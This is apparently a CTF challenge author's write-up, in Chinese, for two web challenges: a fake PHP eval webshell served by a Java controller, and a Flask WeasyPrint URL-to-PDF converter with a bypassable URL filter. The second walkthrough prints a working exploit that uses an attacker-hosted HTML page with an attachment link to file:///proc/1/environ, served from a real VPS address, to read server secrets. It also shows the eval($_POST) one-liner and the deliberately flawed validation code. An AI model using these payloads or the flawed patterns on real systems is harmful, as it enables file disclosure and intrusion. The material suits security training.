真亦假,假亦真
简介:java伪造php一句话马。实则信息泄露一扫就出,flag在/flag里面。
题目描述:开开心心签个到吧,祝各位师傅们好运~
静态flag:NSS{Checkin_h4v3_4_g00D_tINNe!}
/路由显示
php
<?php
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);
//标准一句话木马~
eval($_POST[1]);
?>docker build -t toftoffff . && docker run -d --name=toftoffff -p 9029:9029 --rm toftoffff
WP:
开题
做好事不留名,那我Jay17当然不干好事啦
你不会真去getshell了吧,不会吧不会吧
其实这只是Java伪造的一句话,源码:
java
package org.nss.nss_true_boot01;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.bind.annotation.RestController;
@RestController
public class TestController {
@GetMapping("/")
@ResponseBody
public String index() {
return "<!DOCTYPE html>" +
"<html>" +
"<head><title>签到题题题</title></head>" +
"<body>" +
"<h1>" +
"签到题,直接送大家shell了,做好事不留名,我叫Jay17(6s后页面跳转)<br>" +
"</h1>" +
"<script>" +
"setTimeout(function() {" +
" window.location.href = '/shell.php';" +
"}, 6000);" +
"</script>" +
"</body>" +
"</html>";
}
@GetMapping("/shell.php")
public String shell(){
String htmlContent = "<!DOCTYPE html>" +
"<html>" +
"<body>" +
"<code><span style=\"color: #000000\">" +
"<span style=\"color: #0000BB\"><?</span><span style=\"color: #DD0000\">php</span><br />" +
"error_reporting</span><span style=\"color: #007700\">(</span><span style=\"color: #0000BB\">0</span><span style=\"color: #007700\">);" +
"<br /></span><span style=\"color: #0000BB\">header</span><span style=\"color: #007700\">(</span><span style=\"color: #DD0000\">" +
"'Content-Type: text/html; charset=utf-8'</span><span style=\"color: #007700\">);" +
"<br /></span><span style=\"color: #0000BB\">highlight_file</span><span style=\"color: #007700\">(</span><span style=\"color: #0000BB\">" +
"__FILE__</span><span style=\"color: #007700\">);" +
"<br /><br /></span><span style=\"color: #FF8000\">//标准一句话木马~" +
"<br /></span><span style=\"color: #007700\">eval(</span><span style=\"color: #0000BB\">$_POST</span><span style=\"color: #007700\">[" +
"</span><span style=\"color: #0000BB\">1</span><span style=\"color: #007700\">]);" +
"<br /></span><span style=\"color: #0000BB\">?></span>" +
"</span>" +
"</code>" +
"</body>" +
"</html>";
return htmlContent;
}
@PostMapping("/shell.php")
public String shellhhhh(){
String htmlContent = "<!DOCTYPE html>" +
"<html>" +
"<body>" +
"<code><span style=\"color: #000000\">" +
"<span style=\"color: #0000BB\"><?</span><span style=\"color: #DD0000\">php</span><br />" +
"error_reporting</span><span style=\"color: #007700\">(</span><span style=\"color: #0000BB\">0</span><span style=\"color: #007700\">);" +
"<br /></span><span style=\"color: #0000BB\">header</span><span style=\"color: #007700\">(</span><span style=\"color: #DD0000\">" +
"'Content-Type: text/html; charset=utf-8'</span><span style=\"color: #007700\">);" +
"<br /></span><span style=\"color: #0000BB\">highlight_file</span><span style=\"color: #007700\">(</span><span style=\"color: #0000BB\">" +
"__FILE__</span><span style=\"color: #007700\">);" +
"<br /><br /></span><span style=\"color: #FF8000\">//标准一句话木马~" +
"<br /></span><span style=\"color: #007700\">eval(</span><span style=\"color: #0000BB\">$_POST</span><span style=\"color: #007700\">[" +
"</span><span style=\"color: #0000BB\">1</span><span style=\"color: #007700\">]);" +
"<br /></span><span style=\"color: #0000BB\">?></span>" +
"</span>" +
"</code>" +
"真是shell我能给你?"+
"</body>" +
"</html>";
return htmlContent;
}
@GetMapping("/flag")
public String flag(){
return "真是shell我能给你?不过flag真给你,师傅们玩的愉快~:NSS{Checkin_h4v3_4_g00D_tINNe!}";
}
}如何破局?其实假的一句话木马我有给hint,我故意调错了颜色
同时,flag路由扫一下就出来了。
CSDN_To_PDF V1.2
简介:python WeasyPrint 的漏洞,之前出现过:[FireshellCTF2020]URL TO PDF(BUU)、2023羊城杯决赛(未公开环境)。我进行过二开,加大了一点难度,可以从代码逻辑缺陷入手绕过
hint:
WeasyPrint
会过滤替换字符串html
题目描述:几年前的自用版CSDN博客PDF转换器
源码:
python
from flask import Flask, request, jsonify, make_response, render_template, flash, redirect, url_for
import re
from flask_weasyprint import HTML, render_pdf
import os
app = Flask(__name__)
URL_REGEX = re.compile(
r'http(s)?://'
r'(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
)
def is_valid_url(url):
if not URL_REGEX.match(url):
return False
if "blog.csdn.net" not in url:
return False
return True
@app.route('/', methods=['GET', 'POST'])
def CsdnToPdf():
if request.method == 'POST':
url = request.form.get('url')
url = url.replace("html", "")
if is_valid_url(url):
try:
html = HTML(url=url)
pdf = html.write_pdf()
response = make_response(pdf)
response.headers['Content-Type'] = 'application/pdf'
response.headers['Content-Disposition'] = 'attachment; filename=output.pdf'
return response
except Exception as e:
return f'Error generating PDF', 500
else:
return f'Invalid URL! Target web address: ' + url
else:
return render_template("index.html"), 200
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080)docker build -t csdntopdf . && docker run -d -p 9030:8080 --name csdntopdf -e FLAG=NSSCTF{test_flag} --rm double_pickle
WP:
开题:
源码不知道需不需要给,算了不给了,你们搞黑盒吧,hint都有。
hint如下,能不能发现看大家啦:
1、url不符合要求的话,会返回Invalid URL! Target web address:xxxxx,可以发现我吧字符串
html替换为空,双写绕过就行2、题目提到了CSDN博客PDF转换器,所以url必须包含
blog.csdn.net,看起来无法绕过,但是你看看源码就懂了,前端源码我有给hint,我的css文件用的是:http://120.46.41.173/Jay17/blog.csdn.net/templates/index.css,服务器上有个文件夹是不是叫blog.csdn.net,就这样绕,有想法的师傅可能还能在我的vps同目录下发现源码哦~3、功能是转换成PDF,后端是python。不难想到是WeasyPrint ,这是一个 Python 的虚拟 HTML 和 CSS 渲染引擎,可以用来将网页转成 PDF 文档。旨在支持 Web 标准的打印
原题wp可以看看y4✌的:[BUUCTF][FireshellCTF2020]URL TO PDF-CSDN博客
首先探测一下漏洞:
http://120.46.41.173:9023/blog.csdn.net
vps上文件test.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
</head>
<body>
<link rel="attachment" href="file:///proc/1/environ">
</body>
</html>
我们利用python WeasyPrint 的方法是:
payload:
http://vps-ip/link.html
这题利用方法:
payload:
http://120.46.41.173/Jay17/blog.csdn.net/link.hthtmlml
拿到PDF后,binwalk -e 文件名
赛题测试:
